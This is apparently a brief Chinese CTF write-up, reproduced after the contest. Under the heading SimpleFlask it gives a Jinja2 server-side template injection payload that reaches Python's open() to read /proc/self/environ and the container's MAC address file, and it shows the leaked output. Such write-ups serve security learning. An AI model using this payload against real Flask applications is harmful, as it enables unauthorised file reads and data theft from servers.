没打比赛,赛后复现
0X01 Babyshop
0x02 SimpleFlask
1 | name={{"".__class__.__base__.__subclasses__()[177].__init__.__globals__.__builtins__["open"]("/proc/self/environ").read()}} |
1 | hello HOSTNAME=79a0b2aa07d3HOME=/rootPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/binDEBIAN_FRONTEND=noninteractivePWD=/home/ctfLC_CTYPE=C.UTF-8WERKZEUG_SERVER_FD=3WERKZEUG_RUN_MAIN=true! |
1 | /sys/class/net/eth0/address |
1 | hello 02:42:ac:15:00:06 ! |